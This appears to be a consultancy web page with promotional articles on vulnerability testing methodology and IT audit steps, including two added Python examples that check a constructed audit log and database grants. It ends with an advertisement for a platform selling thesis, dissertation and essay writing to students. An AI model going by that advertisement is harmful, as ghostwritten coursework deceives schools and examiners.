We at Soutech Web Consults are the perfect consulting firm to carry out your penetration testing. We have the professional staff and the team to conduct a detailed and professional penetration test. Subscribe to our services today.


Why do you need a Vulnerability Test? Concepts and Methodologies

First of all, let us understand what a vulnerability is. I define a vulnerability as any loophole, weakness or mistake in a system's security design, implementation, security procedures or controls that can lead to a violation of the system's security policy. A vulnerability can make it possible for a cybercriminal or attacker to gain unauthorized access to the system.

As we already know, confidentiality, integrity and availability are the three core properties of IT security. Once any of these is compromised, one can say there is a security vulnerability; in fact, a single vulnerability can compromise one or all of them. For example, confidentiality is compromised by an information disclosure vulnerability, while integrity and availability can be compromised by a remote code execution vulnerability.

What is Vulnerability Testing?

Vulnerability testing, also referred to as vulnerability assessment, is a testing technique conducted to evaluate the inherent risk in an IT system and the measures employed to reduce the probability of a security event.

Vulnerability testing has similarities with risk assessment, and such assessments can be performed following the steps highlighted below.

  • Developing a catalogue of the assets and resources in the system.
  • Ranking the resources by value and importance.
  • Identifying the potential threats and vulnerabilities to each resource.
  • Eliminating or mitigating the highest-ranked vulnerabilities affecting the most valuable resources.

Vulnerability testing relies mainly on 2 mechanisms:

  • Vulnerability assessment
  • Penetration testing

Objectives of Vulnerability Testing

The common goals and objectives of risk and vulnerability assessments are as follows:

  • To get an accurate inventory of all data and IT assets.
  • To prioritize the organization's IT and data assets according to their importance and criticality to the organization.
  • To identify and document all the potential risks, threats and vulnerabilities to the organization's infrastructure assets.
  • To prioritize the potential risks, threats and known vulnerabilities based on their impact or criticality for the IT or data assets affected.
  • To identify and minimize the vulnerability window of the organization's IT and data assets according to the minimum acceptable tolerance level.
  • To curb, mitigate or remediate the identified risks, threats and vulnerabilities, and to plan and budget for this based on the criticality of the IT and data assets.
  • To check for compliance with current information security laws, regulations, procedures and mandates.
  • As explained previously, to identify lapses, voids and gaps in the organization's IT security framework and architecture, and to make specific recommendations.
  • To identify the potential risks, threats and vulnerabilities that an organization is susceptible to, and to justify the cost of the security countermeasures and solutions adopted to mitigate, eliminate or reduce them.
  • To provide an objective assessment and prompt recommendations that help define the organization's goals and objectives for performing risk and vulnerability assessments.
  • To help organizations understand the return on investment (ROI) whenever funds are invested in IT security infrastructure.
  • To scan operating systems, application software and the entire network for known vulnerabilities such as insecure authentication and software design flaws.

Scope of Vulnerability Testing

  1. Black Box Testing: Vulnerability testing performed from an external network with no prior knowledge of the internal network infrastructure and systems.
  2. White box testing: Vulnerability testing performed from within the internal network with prior knowledge of the internal network infrastructure and systems. White box testing is also referred to as internal testing.
  3. Grey box testing: Vulnerability testing performed from either an external or an internal network with limited knowledge of the internal network infrastructure and systems. It combines black box and white box testing.

Elements of Vulnerability Testing

  • Information Gathering: Also referred to as reconnaissance, this deals with obtaining as much information as possible about the IT environment: networks, IP addresses, versions of operating systems in use and so on. It applies to all 3 scopes of vulnerability assessment.
  • Detection of vulnerabilities: This process uses vulnerability scanners to scan the IT environment and identify known and potential vulnerabilities.
  • Information analysis and planning: This involves analysing all the vulnerabilities that have been identified and devising a means of penetrating the network and the systems.

Types of Vulnerability Test

  1. Predefined Tests: These are vulnerability tests designed to discover common vulnerabilities in databases and their environments. Predefined tests can be customized to suit the needs or requirements of an organization. They include:
    • Configuration Tests: These check a database for all configuration settings related to security, looking for common flaws and mistakes in database configuration. Such configuration issues include:
      • Privileges: system-level rights, privileged access to the database and by users, and rights to use and create objects
      • Configuration: parameter settings for the database and for the system
      • Authentication: use of accounts by users, use of remote logins, password policies
      • Version: the database version and the patches applied to it
      • Objects: sample databases that have been installed, recommended database layouts and ownership of the databases
    • Behavioral Tests: These check and analyse the security posture and health of the database environment by observing the database in real time and checking how information is manipulated. Behavioral tests include:
      • Violations of access rules
      • Excessive login failures
      • Excessive SQL errors
      • Access by default users
      • Logins after hours
      • Execution of DDL or DBCC commands from the client side
      • Checks on stored procedure calls
      • Ensuring a user ID is not used from multiple IP addresses
  2. Query-based vulnerability tests: These can be predefined or user-defined tests, created quickly by modifying SQL queries that are run against database entities or resources.
  3. CVE (Common Vulnerabilities and Exposures) Tests: These check for the common vulnerabilities and exposures published by the MITRE Corporation and report the results for those that relate to the database.
  4. CAS-based Tests: These can be predefined or user-defined tests based on the template of a CAS item found in the OS script command, using the collected data. Users can check which template items match and test against the contents of the CAS results.
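
The behavioral tests listed above (excessive login failures, logins after hours, one user ID used from several IP addresses) are straightforward to express as checks over the database's audit log. The block below is an added example, not the article's own code or that of any product it names. The log format, the log lines and the thresholds are constructed for the demonstration; parse_line is the part to adapt to the audit format of the database engine being assessed.

```python
"""Behavioral database checks run over audit-log lines.

Added example, not code from the article or from any product it names.
The log format, the lines and the thresholds are constructed for the
demonstration; `parse_line` is the part to adapt to the audit format of the
engine being assessed.  Implemented checks: excessive login failures,
after-hours logins, and one user ID seen from several IP addresses.
"""
from collections import defaultdict
from datetime import datetime

# Constructed audit log, one event per line: "<timestamp> <user> <src_ip> <event>"
SAMPLE_LOG = """\
2024-03-04T09:02:11 app_svc 10.0.5.20 LOGIN_OK
2024-03-04T09:02:15 app_svc 10.0.5.20 LOGIN_OK
2024-03-04T12:40:02 sa 10.0.9.77 LOGIN_FAIL
2024-03-04T12:40:03 sa 10.0.9.77 LOGIN_FAIL
2024-03-04T12:40:03 sa 10.0.9.77 LOGIN_FAIL
2024-03-04T12:40:04 sa 10.0.9.77 LOGIN_FAIL
2024-03-04T12:40:05 sa 10.0.9.77 LOGIN_FAIL
2024-03-04T12:40:06 sa 10.0.9.77 LOGIN_FAIL
2024-03-04T15:10:30 bob 10.0.5.44 LOGIN_FAIL
2024-03-04T23:15:40 report_ro 10.0.5.31 LOGIN_OK
2024-03-04T23:16:02 report_ro 203.0.113.9 LOGIN_OK
2024-03-05T02:01:00 app_svc 10.0.5.20 LOGIN_OK
"""

BUSINESS_HOURS = (8, 18)      # 08:00 inclusive to 18:00 exclusive, local time
FAIL_THRESHOLD = 5            # failed logins per user ...
FAIL_WINDOW_SECONDS = 60      # ... inside any window of this length
BATCH_ACCOUNTS = {"app_svc"}  # constructed: accounts expected to log in at night


def parse_line(line):
    ts, user, ip, event = line.split()
    return datetime.fromisoformat(ts), user, ip, event


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def excessive_login_failures(events, threshold=FAIL_THRESHOLD, window=FAIL_WINDOW_SECONDS):
    """Users with at least `threshold` LOGIN_FAIL events inside a sliding window
    of `window` seconds (a brute-force or password-guessing signal)."""
    fails = defaultdict(list)
    for ts, user, _ip, event in events:
        if event == "LOGIN_FAIL":
            fails[user].append(ts)
    flagged = []
    for user, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(user)
                break
    return sorted(flagged)


def after_hours_logins(events, hours=BUSINESS_HOURS, exempt=BATCH_ACCOUNTS):
    """Successful logins outside business hours by accounts not expected to run then."""
    return [(ts.isoformat(), user, ip) for ts, user, ip, event in events
            if event == "LOGIN_OK" and user not in exempt
            and not (hours[0] <= ts.hour < hours[1])]


def multi_ip_users(events):
    """User IDs that logged in successfully from more than one source address
    (shared credentials, or a stolen credential used beside the real user)."""
    addrs = defaultdict(set)
    for _ts, user, ip, event in events:
        if event == "LOGIN_OK":
            addrs[user].add(ip)
    return {user: sorted(ips) for user, ips in addrs.items() if len(ips) > 1}


def run_behavioral_tests(log_text=SAMPLE_LOG):
    events = parse_log(log_text)
    return {
        "excessive_failures": excessive_login_failures(events),
        "after_hours": after_hours_logins(events),
        "multi_ip": multi_ip_users(events),
    }


if __name__ == "__main__":
    for name, finding in run_behavioral_tests().items():
        print(f"{name}: {finding}")
```

On the constructed log the checks flag the sa account (six failures in four seconds), the two late-night report_ro logins, and report_ro as a user ID seen from two addresses, while the batch account's 02:01 login is exempted by policy. The thresholds and the exemption list are what turn these from noisy alerts into usable findings, so agree them with the database owner before the test rather than tuning them afterwards.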

Vulnerability Testing Methodologies

  1. Setup:
  • Begin documenting all assets
  • Secure permissions, credentials and access to the assets
  • Update the tools
  • Configure the tools
  2. Execute the Test:
  • Run the tools to begin execution
  • Run the assessment tools over the captured data packets. (A packet is a unit of data crafted to be routed from a source to a destination. When a file, whether an email, an HTML page or a URL request, is sent from one point to another on the internet, the TCP layer of TCP/IP divides it into small chunks, each with a sequence number in its header for efficient routing; these chunks are the packets. At the destination, the packets are reassembled into the original file.)
  3. Analyze the vulnerabilities:
  • Define and classify the system and network resources
  • Prioritize the resources by importance, such as high, medium and low
  • Identify all potential threats to the assets
  • Based on the priorities, develop a strategy to handle the most important problems first
  • Define and implement measures to mitigate or minimize the consequences of an attack
  4. Form a Report: Develop a report of all the steps taken to arrive at the results. The report is also important as a guide to future understanding of the system and for reporting to the management of the organization.
  5. Remediation plans: This involves developing measures and taking the appropriate steps to fix the vulnerabilities.

Responsibilities of a Vulnerability Tester

  1. Unit management, such as Information Security Coordinators and Unit IT supervisors
  • They support and enforce the standards, and approve and submit the annual risk assessment documents to management.
  • They determine the person who maintains the documentation.
  • They also request internal audits, and procure and assign the resources needed to implement the standards and policies.
  • They notify the users and support staff who are involved in performing the test.
  • They also request any exceptions.
  • They supervise and coordinate the vulnerability test and the remediation processes.
  2. The System Administrator and Computing Device Administrator
  • They implement the best practices needed to comply with the test.
  • They support and comply with the policies.
  • They scan all the systems in the network for compliance with the standards.
  • They actively monitor the systems for available patches in order to remediate issues that can affect users.
  3. Information Security Officer
  • These people approve and oversee all the vulnerability scans.
  • They review and approve the use of any alternative scanning tools when required.
  • They conduct reviews and risk assessments annually.
  • They authorize the removal of devices from the network when needed.

Vulnerability testing focuses on finding loopholes and weaknesses in an IT infrastructure. In my next article I will try to shed some more light on the tools that can be used to perform vulnerability tests, since we now have the standard methodologies to follow in order to perform a detailed vulnerability test.

Soutech Ventures offers courses that can better equip and train you on all you need to know, with practical hands-on knowledge of vulnerability assessment. Subscribe to our CEH course today on www.soutechventures.com/courses

A step by step Guide for IT Auditing: SOUTECH Web Security- Penetration Testing company in Nigeria

An IT audit evaluates the controls surrounding data as they relate to confidentiality, integrity and availability. IT audits help ensure the confidentiality and integrity of information and its availability, which is a key factor in recovering from an incident.

This is a follow-up to the earlier article on IT audits; here I will go deeper into the methodologies and steps for performing audits.


One of the important factors in IT auditing, and one that audit management struggles with consistently, is ensuring that adequate IT audit resources are available to perform the IT audits. Unlike financial audits, IT audits are very knowledge-intensive: an IT auditor performing a web application audit needs training in web applications; one performing an Oracle database audit needs training in Oracle; one performing a Windows operating system audit needs training in Windows, and not just XP: they will need exposure to Vista, Windows 7, Server 2003, Server 2008, IIS, SQL Server and Exchange.

Another factor that audit management faces is the actual management of the IT auditors: not only must they track time against audit objectives, they must also allow time to follow up on the corrective actions the client takes in response to previous findings and recommendations.

The following are the things an IT auditor needs to do before beginning an audit:

  • Review the organizational structure of the IT assets
  • Review all IT policies and procedures
  • Review all the IT standards
  • Review the IT documentation
  • Review the organization’s BIA (business impact analysis)
  • Interview the authorized personnel
  • Observe and monitor the processes and the performance of the employees
  • Examine how controls are tested and the results obtained from the tests.

Steps to Perform IT Audits

1. Understand the Audit Subject Area

  • Tour all the facilities related to the audit
  • Review the background materials
  • Review the IT and business strategic plans
  • Interview the key managers in order to understand the business
  • Review existing audit reports
  • Identify the applicable regulations and where they apply
  • Identify the areas that have been outsourced

2.  Audit Engagement Plan Vocabulary

Subject of the Audit: The area that is to be audited. An example is the information systems related to sales

The objective of the Audit: The purpose of performing the audit. An example is determining if the sales database is safe against data breaches, due to inappropriate authentication, access control, or hacking.

Scope of the Audit: Narrowing the audit to a specific system, function, unit or period of time. An example is a scope constrained to headquarters for the last year.

3.  Perform Risk Assessment: Risk-Based Auditing

Inherent Risk: The susceptibility of the system to a risk before any controls are considered. An example is a bank’s inherent risk of being robbed.

Control Risk: The risk that a problem exists which the internal control system does not detect. Still using the bank as an example, a thief accesses a customer’s account at a money machine (ATM) and is not detected.

Detection Risk: The risk that the auditor does not detect a problem that does exist. In the bank example, a fraud takes place but the audit does not detect it.

Overall Audit Risk: The combination of all of the above audit risks.

4.   Audit Engagement Risk Analysis

5.   Prepare an Audit Engagement Plan

  • Develop a risk-based approach
  • Include audit objectives, required resources, timing, scope
  • Comply with all applicable laws
  • Develop an audit program and procedures

6.  Add Detail to Plan

7.  Evaluate Controls

8. Classification of IT controls

  • Corrective controls: These fix problems that have occurred and prevent their recurrence, using:
    • Contingency planning
    • Backup procedures
  • Detective controls: These find problems or fraud when they occur, using:
    • Hash totals
    • Check points
    • Duplicate checking
    • Error messages
    • Past-due account reports
    • Review of activity logs
  • Preventive controls: Preventive control measures include:
    • Programmed edit checks
    • Encryption software
    • Access control software
    • A well-designed set of procedures
    • Physical controls
    • Employing only qualified personnel

9.  Evaluate Controls: Simple Control Matrix

Testing Vocabulary

Compliance Testing:  A compliance test asks the following

  • Are there controls in place and are they consistently applied?
  • Check access control
  • Ensure program change control
  • Procedure documentation
  • Program documentation
  • Software license audits
  • System log reviews
  • Exception follow-ups

Substantive Testing:  Check the following:

  • Are transactions processed accurately?
  • Is data collected correct and accurate?
  • Double check processing
  • Calculation validation
  • Error checking
  • Operational documentation

If the results for the compliance testing are poor, the substantive testing should increase in type and sample number.

Compliance Testing: An example control matrix

  • Control: Is production software controlled?
    • Test: Are production executable files built from production source files?
    • Test: Are proper procedures followed in their release?
  • Control: Is access to the sales database constrained to Least Privilege?
    • Test: Are permissions allocated according to documentation?
    • Test: When persons gain access to the database, can they access only what is allowed?
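The following is an added example, not code from the original article, of how the Least Privilege compliance test above can be carried out: the documented permission matrix for the sales database is compared with the grants actually in place, and every deviation is reported. The role names, object names and GRANT export are constructed for this example, and ALL PRIVILEGES is assumed to expand to the four basic data privileges.

```python
"""Compliance test: are sales database permissions allocated as documented?

Added example. The documented matrix, the grant export and the meaning of
ALL PRIVILEGES below are assumptions; a real test would use the DBA's export.
"""
import re

# Documented access matrix for the sales database: role -> {object: {privileges}}
DOCUMENTED = {
    "sales_app": {"sales.orders": {"SELECT", "INSERT"},
                  "sales.customers": {"SELECT"}},
    "sales_report": {"sales.orders": {"SELECT"}},
}

# Constructed export of effective grants, one GRANT statement per line
ACTUAL_GRANTS = """\
GRANT SELECT, INSERT ON sales.orders TO sales_app
GRANT SELECT, UPDATE, DELETE ON sales.customers TO sales_app
GRANT SELECT ON sales.orders TO sales_report
GRANT SELECT ON sales.salaries TO sales_report
GRANT ALL PRIVILEGES ON sales.orders TO intern_bob
"""

GRANT_RE = re.compile(
    r"GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<obj>\S+)\s+TO\s+(?P<role>\S+)", re.I)
ALL = {"SELECT", "INSERT", "UPDATE", "DELETE"}   # assumed expansion of ALL PRIVILEGES


def parse_grants(text):
    """Build role -> {object: {privileges}} from GRANT statements."""
    matrix = {}
    for line in text.splitlines():
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m["privs"].split(",")}
        if privs & {"ALL PRIVILEGES", "ALL"}:
            privs = set(ALL)
        matrix.setdefault(m["role"], {}).setdefault(m["obj"], set()).update(privs)
    return matrix


def least_privilege_findings(documented, actual):
    """Return sorted (role, object, kind, privileges) deviations.

    kind is 'excess' (granted but not documented: a least-privilege finding)
    or 'missing' (documented but not granted: a documentation deviation).
    """
    findings = []
    for role in set(documented) | set(actual):
        for obj in set(documented.get(role, {})) | set(actual.get(role, {})):
            doc = documented.get(role, {}).get(obj, set())
            act = actual.get(role, {}).get(obj, set())
            if act - doc:
                findings.append((role, obj, "excess", ",".join(sorted(act - doc))))
            if doc - act:
                findings.append((role, obj, "missing", ",".join(sorted(doc - act))))
    return sorted(findings)
```

An undocumented role such as intern_bob shows up as a finding on every object it can reach, which answers the second test as well: what persons can access once they are in the database.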

Substantive Testing: An example control matrix

  • Audit: Is the financial statement section related to sales accurate?
    • Test: Track the processing of sample transactions through the system by performing the calculations manually
    • Test: Test error conditions
  • Audit: Is the tape inventory correct?
    • Test: Select sample days and verify complete documentation and tape completeness

Tools for IT Audits

ISACA publishes standards and guidelines related to IT audit:

  • Section 2200 General Standards
  • Section 2400 Performance Standards
  • Section 2600 Reporting Standards
  • Section 3000 IT Assurance Guidelines
  • Section 3200 Enterprise Topics
  • Section 3400 IT Management Processes
  • Section 3600 IT Audit and Assurance Processes
  • Section 3800 IT Audit and Assurance Management
  • Translate the basic audit objectives into specific IT audit objectives
  • Identify and select the best audit approach to verify and test controls
  • Identify individuals to interview
  • Obtain departmental policies, standards, procedures, guidelines to review
  • Develop audit tools and methodology

IT General Controls Check List

1. Documentation of employees and the organization

  • Organizational chart
    • Company
    • IT Department
  • Current phone list / company directory
  • Job descriptions for the IT Department
  • Sample employee evaluation form
  • List of all terminations / disengagements in the last 12 months
  • New hire checklist
  • Termination checklist
  • IT project list: planned, completed in the last 12 months, or ongoing
  • Review of the past year’s management response letter

2. Documentation of IT policies and procedures

  • Network architecture diagram and documentation
  • Network diagram
  • Diagram and list of hosts and servers that run financial applications
  • Change management policies and procedures
  • Inventory of network hardware and software
  • Computer operations policies and procedures
  • Security policies
  • Password policies
  • Acceptable use policy
  • Incident response policies
  • Security awareness training curriculum
  • Firewall configurations and rule sets
  • Software policies and procedures
  • Remote access policies
  • Policies for e-mail, instant messaging and internet usage
  • Disaster recovery and business contingency plan
  • Data backup and data recovery policies
  • Backup logs
  • Offsite tape rotation logs
  • Listing of IT-related insurance coverage
  • Copies of vendor contracts and service level agreements
  • Help desk request tracking forms and trouble tickets
  • Reports of open and closed tickets
  • Batch processing procedures


When performing an IT audit, the responsibility of the auditor general is to check whether the IT system complies with government IT policies, procedures, standards, laws and regulations. The auditor general should also make use of IT audit tools, technical guides and the resources recommended by ISACA (Information Systems Audit and Control Association) where appropriate. ISACA also encourages IT audit staff, and the team as a whole, to be certified. Certifications include, but are not limited to:

  • CISA (Certified Information systems Auditor)
  • CIA (Certified Internal Auditor)
  • CISM (Certified Information Security Manager)
  • CGEIT (Certified in the Governance of Enterprise IT)

The Audit Report

After a successful audit process, the IT auditor needs to produce detailed documentation. Here is a list of a few things an auditor needs to include in the audit documentation:

  • The planned scope and objectives of the audit
  • A description of the audit area
  • The audit program
  • The steps performed and the audit evidence gathered
  • Whether the services of other auditors or IT experts were used, and what their contributions were
  • Findings, conclusions and recommendations
  • Audit documentation with document dates and identification
  • The report produced from the audit performed
  • Evidence of audit supervisory review

The audit results should be presented to the organization at the exit meeting, where you can take time to discuss your findings and recommendations in detail. You should be certain of the following:

  • That all the facts and findings noted in the report are accurate
  • That the recommendations you have made are cost-effective and realistic, or that alternatives have been negotiated with management
  • That the dates for the recommended implementation have been agreed.

There are some other things you need to consider when you are preparing to present your final report. Consider the audience, and whether the presentation is going to be made to the audit committee; the audit committee may not need the minutiae that go into the detailed report. Your report should be delivered in a timely manner so as to leave room for any corrections.

Finally, if you come across a significant finding in the course of the IT audit, you should inform management immediately.

Always subscribe to Soutech Ventures where we can handle all your IT solutions especially in the areas of IT audits.

Also enroll for a cyber security, ethical hacking training at SOUTECH.

Professional Freelance Portal in Nigeria: Business and Academic Solutions


SOUTECH Web Consults – (a smart and budding Information Technology (IT) startup is launching a platform with innovative, intelligent, knowledgeable and experienced persons running “Project and Research Nigeria”

“To provide a Smart, Premium and Robust Platform for bespoke solutions to individuals in the college, corporate and business world”- Mission Statement
It is a premium platform for consultancy in research and a freelance center for Undergraduate, PostGrad and PhD, workplace and occupational projects.
We will be having 800+ freelance vacancies for professionals and experts and over 3000 agents globally for the platform.
www.ProjectAndResearchNg.com is a team of online experts in Nigeria with freelance partners in other countries. Its services include bringing experts to users for various academic and occupational projects and assignments.
ProjectAndResearchNg.com offers online assistance in various tested fields. Our experts come from diverse backgrounds and have years of experience in academia and other occupational fields. The prerequisite for becoming one of our experts is extensive hands-on experience or holding a Master's or PhD degree in the respective field, together with years of experience in project writing, thesis writing, dissertation help and essay writing.
We provide help in almost all subjects, such as marketing, finance, law, statistics, medicine, HRM, English and accounting, and engineering subjects such as electrical, mechanical and computer science.
Our Job/Project Experts:


These experts undergo a rigorous series of assessments and tests before they become part of our team, so we deliver the best service to students and companies alike. We believe in providing detailed step-by-step solutions to every academic assignment and every occupational and business problem.
Experts will also render bespoke professional services to individuals, companies, NGOs and organizations needing professional help in running their projects and businesses.
We deliver non-plagiarized work with proper referencing, reviewed by a team of quality assurance experts to meet global standards.
You might want to be among the premium 800+ experts or 3000 agents worldwide.
For News Updates, Jobs, Connect with us and Like Our Page via:
www.facebook.com/ProjectAndResearchNigeria
www.ProjectAndResearchNg.com
jobs@projectandresearchng.com
+2348034121380

Thanks.